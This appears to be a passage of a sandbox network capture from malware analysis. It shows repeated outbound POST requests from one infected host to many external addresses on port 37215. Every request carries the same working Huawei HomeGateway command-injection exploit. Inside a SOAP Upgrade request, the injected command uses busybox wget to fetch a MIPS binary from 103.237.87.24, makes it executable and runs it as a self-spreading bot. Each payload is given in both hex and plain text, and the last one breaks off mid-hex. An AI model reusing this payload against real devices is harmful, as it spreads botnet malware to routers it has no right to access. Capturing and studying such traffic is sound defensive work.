                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  618192.168.2.1335104157.119.129.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.299979925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  619192.168.2.1339554157.51.156.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.299981117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  620192.168.2.1342598157.202.124.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.299999952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  621192.168.2.1356026157.51.79.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300018072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  622192.168.2.1354632197.31.204.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300025940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  623192.168.2.134430279.1.148.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300062895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  624192.168.2.134345441.163.100.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300062895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  625192.168.2.135203441.197.39.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300062895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  626192.168.2.1351178197.189.135.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300076962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  627192.168.2.1347014157.26.211.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.300086975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 